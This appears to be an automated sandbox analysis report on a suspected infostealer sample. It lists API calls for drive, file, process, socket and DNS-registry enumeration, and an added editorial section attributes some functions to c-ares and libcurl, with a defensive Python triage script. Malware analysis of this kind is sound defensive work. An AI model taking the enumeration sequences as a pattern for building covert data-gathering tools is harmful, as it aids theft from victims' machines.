71332->71333 71335 6e50379 71333->71335 71337 6e501b0 GetLogicalDrives 71336->71337 71339 6e50379 71337->71339 71341 6e50131 GetLogicalDrives 71340->71341 71343 6e50379 71341->71343 71345 6e50190 GetLogicalDrives 71344->71345 71347 6e50379 71345->71347 71349 6e5010d GetLogicalDrives 71348->71349 71351 6e50379 71349->71351 71352 d43d5e 71357 d43d30 71352->71357 71353 d43d90 71361 d4fcb0 7 API calls 71353->71361 71356 d43dc1 71357->71352 71357->71353 71358 d50ab0 71357->71358 71362 d505b0 71358->71362 71360 d50acd 71360->71357 71361->71356 71363 d507c7 71362->71363 71364 d505bd 71362->71364 71363->71360 71364->71363 71365 d507ef 71364->71365 71366 d50707 WSAEventSelect 71364->71366 71372 d476a0 
71364->71372 71365->71363 71370 d50847 71365->71370 71376 d56fa0 71365->71376 71366->71363 71366->71364 71369 d509e8 WSAEnumNetworkEvents 71369->71370 71371 d509d0 WSAEventSelect 71369->71371 71370->71363 71370->71369 71370->71371 71371->71369 71371->71370 71373 d476e6 send 71372->71373 71374 d476c0 71372->71374 71375 d476c9 71373->71375 71374->71373 71374->71375 71375->71364 71377 d56fd4 71376->71377 71379 d56feb 71376->71379 71378 d57207 select 71377->71378 71377->71379 71378->71379 71379->71370 71538 d429ff FindFirstFileA 71539 d42a31 71538->71539 71540 d42a5c RegOpenKeyExA 71539->71540 71541 d42a93 71540->71541 71542 d42ade CharUpperA 71541->71542 71543 d42b0a 71542->71543 71544 d42bf9 QueryFullProcessImageNameA 71543->71544 71545 d42c3b CloseHandle 71544->71545 71547 d42c64 71545->71547 71546 d42df1 CloseHandle 71548 d42e23 71546->71548 71547->71546 71380 10cb180 Sleep 71549 11c7830 71562 10cdd50 71549->71562 71551 11c7866 71552 11c785a 71552->71551 71565 10d12c0 71552->71565 71554 11c78a6 71555 11c789a 71555->71554 71556 11c7906 71555->71556 71557 11c7950 71555->71557 71558 11c7944 71556->71558 71570 10cb500 _lock 71556->71570 71569 10cb500 _lock 71557->71569 71561 11c7979 71571 10d7430 71562->71571 71564 10cdd61 71564->71552 71566 10d12cc 71565->71566 71575 10ce050 71566->71575 71568 10d12fa 71568->71555 71569->71561 71570->71561 71573 10d7444 71571->71573 71572 10d7458 71572->71564 71573->71572 71574 10d747c _lock 71573->71574 71574->71564 71582 10ce09d 71575->71582 71589 10ce503 71575->71589 71576 10cfee7 71594 10cdff0 ungetc 71576->71594 71577 10ce18e 71579 10ced90 ungetc 71577->71579 71585 10ce1a6 71577->71585 71579->71585 71580 10d0250 ungetc 71580->71589 71581 10d11a4 ungetc 71581->71589 71582->71577 71582->71585 71587 10ce388 71582->71587 71588 10ce243 71582->71588 71582->71589 71583 10d0742 ungetc 71583->71585 71584 10d08d7 ungetc 71584->71589 71585->71568 71587->71585 71587->71589 71593 10d00b8 ungetc 71587->71593 71588->71583 71588->71585 
71589->71576 71589->71580 71589->71581 71589->71584 71589->71585 71589->71588 71591 10d0006 ungetc 71589->71591 71592 10d0e3e ungetc 71589->71592 71595 10cdff0 ungetc 71589->71595 71596 10cb1a0 islower islower 71589->71596 71591->71589 71592->71589 71593->71587 71594->71585 71595->71589 71596->71589 71597 d51139 71598 d51148 71597->71598 71600 d51527 71598->71600 71602 d50f00 71598->71602 71605 d4fec0 7 API calls 71598->71605 71600->71602 71606 d522d0 7 API calls 71600->71606 71603 d50f7b 71602->71603 71607 d7d4d0 socket ioctlsocket connect getsockname closesocket 71602->71607 71605->71600 71606->71602 71607->71602 71381 6e903b9 Process32FirstW 71382 6e903d1 71381->71382 71608 6ea0419 71609 6ea03da Process32NextW 71608->71609 71611 6ea047e 71609->71611 71612 d5d5e0 71613 d5d652 WSAStartup 71612->71613 71614 d5d5f0 71612->71614 71613->71614 71383 d7b3c0 71384 d7b3ee 71383->71384 71385 d7b3cb 71383->71385 71387 d476a0 send 71385->71387 71389 d79290 71385->71389 71386 d7b3ea 71387->71386 71390 d476a0 send 71389->71390 71391 d792e5 71390->71391 71392 d79392 71391->71392 71393 d79335 WSAIoctl 71391->71393 71392->71386 71393->71392 71394 d79366 71393->71394 71394->71392 71395 d79371 setsockopt 71394->71395 71395->71392 71396 d7e400 71397 d7e459 71396->71397 71399 d7e412 71396->71399 71400 d768b0 socket ioctlsocket connect getsockname closesocket 71399->71400 71400->71397 71401 d7b400 71402 d7b425 71401->71402 71403 d7b40b 71401->71403 71406 d47770 71403->71406 71404 d7b421 71407 d477b6 recv 71406->71407 71408 d47790 71406->71408 71409 d47799 71407->71409 71408->71407 71408->71409 71409->71404 71410 d413c9 71413 d41160 71410->71413 71412 d41231 SetUnhandledExceptionFilter 71412->71413 71413->71412 71414 d413a1 71413->71414 71415 10c8a20 12 API calls 71413->71415 71415->71413 71416 df3c00 71417 df3c23 71416->71417 71419 df3c0d 71416->71419 71417->71419 71420 e0b180 71417->71420 71426 e0b19b 71420->71426 71427 e0b2e3 71420->71427 71423 e0b2a9 getsockname 71437 e0b020 
71423->71437 71425 e0b020 closesocket 71425->71426 71426->71423 71426->71425 71426->71427 71428 e0af30 71426->71428 71432 e0b060 71426->71432 71427->71419 71429 e0af63 socket 71428->71429 71430 e0af4c 71428->71430 71429->71426 71430->71429 71431 e0af52 71430->71431 71431->71426 71436 e0b080 71432->71436 71433 e0b0b0 connect 71434 e0b0bf WSAGetLastError 71433->71434 71435 e0b0ea 71434->71435 71434->71436 71435->71426 71436->71433 71436->71434 71436->71435 71438 e0b052 71437->71438 71439 e0b029 71437->71439 71438->71426 71440 e0b04b closesocket 71439->71440 71441 e0b03e 71439->71441 71440->71438 71441->71426 71615 df4720 71619 df4728 71615->71619 71616 df4733 71618 df4774 71619->71616 71626 df476c 71619->71626 71627 df5540 socket ioctlsocket connect getsockname closesocket 71619->71627 71621 df482e 71621->71626 71628 df9270 71621->71628 71623 df4860 71633 df4950 71623->71633 71625 df4878 71626->71625 71641 df30a0 socket ioctlsocket connect getsockname closesocket 71626->71641 71627->71621 71642 dfa440 71628->71642 71630 df9297 71631 df92ab 71630->71631 71678 dfbbe0 socket ioctlsocket connect getsockname closesocket 71630->71678 71631->71623 71634 df4966 71633->71634 71639 df49b9 71634->71639 71640 df49c5 71634->71640 71680 dfb590 if_indextoname 71634->71680 71636 df4a3e 71636->71640 71681 dfbbe0 socket ioctlsocket connect getsockname closesocket 71636->71681 71637 df4aa0 gethostname 71637->71639 71637->71640 71639->71637 71639->71640 71640->71626 71641->71618 71643 dfa46b 71642->71643 71644 dfa4db 71643->71644 71645 dfa48b GetAdaptersAddresses 71643->71645 71646 dfaa03 RegOpenKeyExA 71644->71646 71657 dfad14 71644->71657 71662 dfa4a6 71645->71662 71676 dfa520 71645->71676 71647 dfaa27 RegQueryValueExA 71646->71647 71648 dfab70 RegOpenKeyExA 71646->71648 71649 dfaacc RegQueryValueExA 71647->71649 71650 dfaa71 71647->71650 71651 dfac34 RegOpenKeyExA 71648->71651 71652 dfab90 71648->71652 71654 dfab0e 71649->71654 71655 dfab66 RegCloseKey 71649->71655 71650->71649 71659 
dfaa85 RegQueryValueExA 71650->71659 71653 dfacf8 RegOpenKeyExA 71651->71653 71675 dfac54 71651->71675 71652->71651 71656 dfad56 RegEnumKeyExA 71653->71656 71653->71657 71654->71655 71663 dfab1e RegQueryValueExA 71654->71663 71655->71648 71656->71657 71660 dfad9b 71656->71660 71657->71630 71658 dfa4f3 GetAdaptersAddresses 71670 dfa505 71658->71670 71658->71676 71667 dfaab3 71659->71667 71661 dfae16 RegOpenKeyExA 71660->71661 71664 dfaddf RegEnumKeyExA 71661->71664 71665 dfae34 RegQueryValueExA 71661->71665 71662->71658 71662->71676 71669 dfab4c 71663->71669 71664->71657 71664->71661 71668 dfaf43 RegQueryValueExA 71665->71668 71677 dfadaa 71665->71677 71666 dfa527 GetAdaptersAddresses 71666->71676 71667->71649 71672 dfb052 RegQueryValueExA 71668->71672 71668->71677 71669->71655 71670->71666 71670->71676 71673 dfadc7 RegCloseKey 71672->71673 71672->71677 71673->71664 71674 dfafa0 RegQueryValueExA 71674->71677 71675->71653 71676->71644 71679 dfb830 if_indextoname 71676->71679 71677->71668 71677->71672 71677->71673 71677->71674 71678->71631 71679->71644 71680->71636 71681->71639

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 00D42579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00D425CC
                                                            • GetDriveTypeA.KERNELBASE ref: 00D42647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00D4267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 00D427E2
                                                            • FindFirstFileW.KERNELBASE ref: 00D428F8
                                                            • FindNextFileW.KERNELBASE ref: 00D4291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                            • String ID: @$`
                                                            • API String ID: 3271271169-3318628307
                                                            • Opcode ID: b26dfe311aaa23b1be4435169bd2691dda7fc91328063717ed0ea8a7e7757b4f
                                                            • Instruction ID: 8a2ff64905fdbcd96f7a94e4abc1ebae66b367066afaa30191a192f5827d8695
                                                            • Opcode Fuzzy Hash: b26dfe311aaa23b1be4435169bd2691dda7fc91328063717ed0ea8a7e7757b4f
                                                            • Instruction Fuzzy Hash: EBD1A3B4909319DFDB14EF68C58469EBBF0BF58748F00896DE89897350E7349A84CF92

                                                            Control-flow Graph
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: 25b1e6a123e66e792f70f38b10aefe383f28e79780c556e457f1ad18b101075a
                                                            • Instruction ID: 68ce42b2e58126816aa3cc7015f116eb5fd3545af9f529e753db0eca7c479ed4
                                                            • Opcode Fuzzy Hash: 25b1e6a123e66e792f70f38b10aefe383f28e79780c556e457f1ad18b101075a
                                                            • Instruction Fuzzy Hash: 28E1E7B49053099FCB14EF68DA846AEBBF4AF54344F40886EE888D7354E774DA84CF52

                                                            Control-flow Graph
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00D50712
                                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00D509DC
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00D509FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: multi.c
                                                            • API String ID: 2170980988-214371023
                                                            • Opcode ID: 9908621219804423f50790488a8791d0bebfb0f04c3e0aa61b9b2169db88c29d
                                                            • Instruction ID: 355dc643890fb49445a107290489b6c500423d629e5d762969e009c6fcd86f62
                                                            • Opcode Fuzzy Hash: 9908621219804423f50790488a8791d0bebfb0f04c3e0aa61b9b2169db88c29d
                                                            • Instruction Fuzzy Hash: B6D1AE756083019FEB10DF64C881BAB7BE9FF94345F08482CFD9596242E774E958CBA2

                                                            Control-flow Graph
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491
                                                            • Opcode ID: f466e99241ec45ec0e5e417d2dc59b5f2e73aefd075741deedc117e8030fcd78
                                                            • Instruction ID: 73e91bc8e72d2efce2d1dc08c0dc3374c9e49358a117c151b7c6a3438cc54dee
                                                            • Opcode Fuzzy Hash: f466e99241ec45ec0e5e417d2dc59b5f2e73aefd075741deedc117e8030fcd78
                                                            • Instruction Fuzzy Hash: FF110AF5A193447BE220AA259DCAE773F9CDBC6B68F48091CBC4463346E6619D0086F2
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 00E0B2B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            • Opcode ID: f2539a3d969564923b19598592a2067285110886e76297f7e10d6f7aa2c70cb0
                                                            • Instruction ID: 793f0a896ca196a64aecb80eab13ffeef4179dbf27c07e1f4da4d4c97376377c
                                                            • Opcode Fuzzy Hash: f2539a3d969564923b19598592a2067285110886e76297f7e10d6f7aa2c70cb0
                                                            • Instruction Fuzzy Hash: DFC17F716043059FD718DF24C880A6A77E2FF88304F14996CE889AB3E2E775ED85CB81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c879ece255b1a650a35fddf704469e959e532450e15362aac6ed41a73120189
                                                            • Instruction ID: 29d79e2c740ab0904ebcce9fa87473792bc2068b929e4d9d4327ec4077012ca3
                                                            • Opcode Fuzzy Hash: 9c879ece255b1a650a35fddf704469e959e532450e15362aac6ed41a73120189
                                                            • Instruction Fuzzy Hash: 5291163060C7094BDB358A29E8807BB72E5EFD4365F389B2CECA9431D4E7749C48D6A1
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00D41238
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c650bb16cf55a038a270c8892c1c09b9286e1569cafb3a92e516ea9d7ff6949d
                                                            • Instruction ID: 644413701bd40c375c8dea5cffc2776f3d22aed6cabe1d60e226229db1d2e272
                                                            • Opcode Fuzzy Hash: c650bb16cf55a038a270c8892c1c09b9286e1569cafb3a92e516ea9d7ff6949d
                                                            • Instruction Fuzzy Hash: E781BEB59053058FDB20EF64E5843ADBBE1FB55304F14892DC9899B318D775E884CFA2
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00D41238
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c61adcd11351be74aa8d0f43da99a534e96864a0d4dfd3f2f8e3fe54e78b0446
                                                            • Instruction ID: a927d88e16447f63e14eaa8f8181219ef813071c9a02c16d7e2103e62bb8747b
                                                            • Opcode Fuzzy Hash: c61adcd11351be74aa8d0f43da99a534e96864a0d4dfd3f2f8e3fe54e78b0446
                                                            • Instruction Fuzzy Hash: 314159B8A053118FDB20EF64E58439EBBF0BF59304F04892DD9889B358D770A885CFA1
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00D41238
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: e21645bbd7dd48fc2718e435c06e75a7cae2067d5ff33ff5c77d955e3319e175
                                                            • Instruction ID: c27015d86259a133ec6b647f2d9570364ec16a3b563789223f52f2b30ebf6dae
                                                            • Opcode Fuzzy Hash: e21645bbd7dd48fc2718e435c06e75a7cae2067d5ff33ff5c77d955e3319e175
                                                            • Instruction Fuzzy Hash: 194139B49053128FDB60EF64E18039DBBF0BF55314F14882EC9889B318D774A885CFA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 2f5eb22ba8203d881c0ef5644e5cee3259a25fadf2173da44d3b44955048e9ae
                                                            • Instruction ID: 7ef8f6ca0c3a8dd18dc8447bd6de8966512e377d3ef944b18575df58220142eb
                                                            • Opcode Fuzzy Hash: 2f5eb22ba8203d881c0ef5644e5cee3259a25fadf2173da44d3b44955048e9ae
                                                            • Instruction Fuzzy Hash: BA3182B4909319DFCB10EFB8C58469EBBF0AF54748F00896DE899A7240E7749A44CF92
                                                            APIs
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00DFA499
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00DFA4FB
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00DFA531
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00DFAA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00DFAA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00DFAA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00DFAAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00DFAB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 00DFAB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00DFAB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00DFAC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00DFAD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 00DFAD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 00DFADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 00DFAE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00DFAE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00DFAE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00DFAF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00DFAFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00DFB072
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4281207131-1047472027
                                                            • Opcode ID: 30ec499e3eb3753cdfbac182721dae70082427344c88a5fc14d30572154d49a9
                                                            • Instruction ID: 39f612e2c492a1d61c51192869b1d58c9df841c9f1a16fae89583f532cda2a18
                                                            • Opcode Fuzzy Hash: 30ec499e3eb3753cdfbac182721dae70082427344c88a5fc14d30572154d49a9
                                                            • Instruction Fuzzy Hash: 4972D3B1604305ABE320DF24DC81B6B77E8AF95740F19982CFA89D7291E774E944CB63
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00D7A832
                                                            Strings
                                                            • Trying [%s]:%d..., xrefs: 00D7A689
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00D7A796
                                                            • Local port: %hu, xrefs: 00D7AF28
                                                            • cf-socket.c, xrefs: 00D7A5CD, 00D7A735
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00D7AE1F
                                                            • bind failed with errno %d: %s, xrefs: 00D7B080
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00D7AE60
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00D7ADAC
                                                            • Trying %s:%d..., xrefs: 00D7A7C2, 00D7A7DE
                                                            • Could not set TCP_NODELAY: %s, xrefs: 00D7A871
                                                            • @, xrefs: 00D7AC42
                                                            • Bind to local port %d failed, trying next, xrefs: 00D7AFE5
                                                            • @, xrefs: 00D7A8F4
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00D7A6CE
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00D7AD0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 837c822e0ac44b1a1fe7092571a9581d732a4eac0588316a8b9f9f8fc148a82a
                                                            • Instruction ID: 6b7707928aa4e67279a1d3a73a77199aa609fbbdcd53dae0b0a1d2f2da3776af
                                                            • Opcode Fuzzy Hash: 837c822e0ac44b1a1fe7092571a9581d732a4eac0588316a8b9f9f8fc148a82a
                                                            • Instruction Fuzzy Hash: F762C171508341ABE7258F18C846BABB7E5EFC1314F08891DF98C97292F771A945CBA3
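The two function records above (the GetAdaptersAddresses/registry walk ending at 00DFB072 and the setsockopt function at 00D7A832), together with the DatabasePath lookup listed next, carry the API sequence and string set of statically linked library code rather than stealer logic: the walk over Tcpip\Parameters, the two DNSClient policy keys and the per-interface Domain/DhcpDomain values is how c-ares assembles the Windows DNS suffix list, the cf-socket.c messages belong to libcurl's socket connect filter, and DatabasePath is where c-ares locates the hosts file. That attribution is the editor's assessment from those libraries' public sources, not a finding of this report, and on its own none of these functions supports the "Infostealer behavior" verdict. The Python below is an added triage example, not Joe Sandbox or sample code: it fingerprints function records transcribed from this page against those library patterns so that the unmatched functions can be prioritised for manual review. The record contents are copied from the report; the fingerprint names and the FunctionRecord/classify/triage helpers are the editor's own.

```python
"""
Fingerprint Joe Sandbox function records against statically linked library code.

Added example, not part of the Joe Sandbox report. The records below are
transcribed from this report's own function entries (API names, registry
paths, string references); the library attributions (c-ares, libcurl) are the
editor's assessment based on those libraries' public sources, not something
the report itself states.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class FunctionRecord:
    entry: str                                          # address shown in the record
    apis: list[str] = field(default_factory=list)       # API names without module suffix
    strings: list[str] = field(default_factory=list)    # string refs and literal API args


# A record matches a fingerprint when it imports every listed API and at least
# one of its strings contains each listed substring.
LIBRARY_FINGERPRINTS: dict[str, dict[str, set[str]]] = {
    "c-ares: Windows DNS suffix/search-list configuration": {
        "apis": {"GetAdaptersAddresses", "RegOpenKeyExA", "RegQueryValueExA", "RegEnumKeyExA"},
        "strings": {
            r"System\CurrentControlSet\Services\Tcpip\Parameters",
            r"Software\Policies\Microsoft\Windows NT\DNSClient",
            "SearchList",
            "DhcpDomain",
        },
    },
    "c-ares: hosts-file path lookup (DatabasePath)": {
        "apis": {"RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"},
        "strings": {r"System\CurrentControlSet\Services\Tcpip\Parameters", "DatabasePath"},
    },
    "libcurl: lib/cf-socket.c connection setup": {
        "apis": {"setsockopt"},
        "strings": {"cf-socket.c", "Could not set TCP_NODELAY: %s", "cf_socket_open() -> %d, fd=%d"},
    },
}


def classify(rec: FunctionRecord) -> list[str]:
    """Return the names of every fingerprint the record satisfies (possibly none)."""
    apis = set(rec.apis)
    hits = []
    for name, fp in LIBRARY_FINGERPRINTS.items():
        if not fp["apis"] <= apis:
            continue
        if all(any(needle in s for s in rec.strings) for needle in fp["strings"]):
            hits.append(name)
    return hits


def triage(records: list[FunctionRecord]) -> tuple[dict[str, list[str]], list[str]]:
    """Split records into (library code by entry address, residual entry addresses)."""
    library: dict[str, list[str]] = {}
    residual: list[str] = []
    for rec in records:
        hits = classify(rec)
        if hits:
            library[rec.entry] = hits
        else:
            residual.append(rec.entry)
    return library, residual


# Records transcribed from this report (addresses are the first API ref of each).
TCPIP = r"System\CurrentControlSet\Services\Tcpip\Parameters"
SAMPLE_RECORDS = [
    FunctionRecord("00D41238", ["SetUnhandledExceptionFilter"], []),
    FunctionRecord(
        "00DFA499",
        ["GetAdaptersAddresses", "RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey", "RegEnumKeyExA"],
        ["DhcpDomain", "Domain", "PrimaryDNSSuffix", "SearchList",
         r"Software\Policies\Microsoft\System\DNSClient",
         r"Software\Policies\Microsoft\Windows NT\DNSClient",
         TCPIP, TCPIP + r"\Interfaces"],
    ),
    FunctionRecord(
        "00D7A832",
        ["setsockopt"],
        ["Trying %s:%d...", "cf_socket_open() -> %d, fd=%d", "Local port: %hu", "cf-socket.c",
         "Could not set TCP_NODELAY: %s", "bind failed with errno %d: %s"],
    ),
    # Strings section of this record is empty in the report; the literals come
    # from the RegOpenKeyExA / RegQueryValueExA argument lists.
    FunctionRecord("00E09946", ["RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"],
                   [TCPIP, "DatabasePath"]),
]


if __name__ == "__main__":
    lib, rest = triage(SAMPLE_RECORDS)
    for entry, names in lib.items():
        print(f"{entry}: library code ({'; '.join(names)})")
    print("review first:", ", ".join(rest))
```

Run stand-alone it prints the three library attributions and leaves 00D41238 (the SetUnhandledExceptionFilter functions, which look like CRT startup code but do not match any fingerprint here) as the residual to look at first. Fingerprints require all of their APIs and strings, so a function that merely opens Tcpip\Parameters without reading DatabasePath is not claimed as c-ares.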

                                                            Control-flow Graph
                                                            (rendered graph not reproduced; the edge list covered the basic blocks e09740 through e0a070 of the function whose APIs are listed next, with each block marked Executed or Not Executed)
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E09946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E09974
                                                            • RegCloseKey.KERNELBASE(?), ref: 00E0998B
                                                            Strings
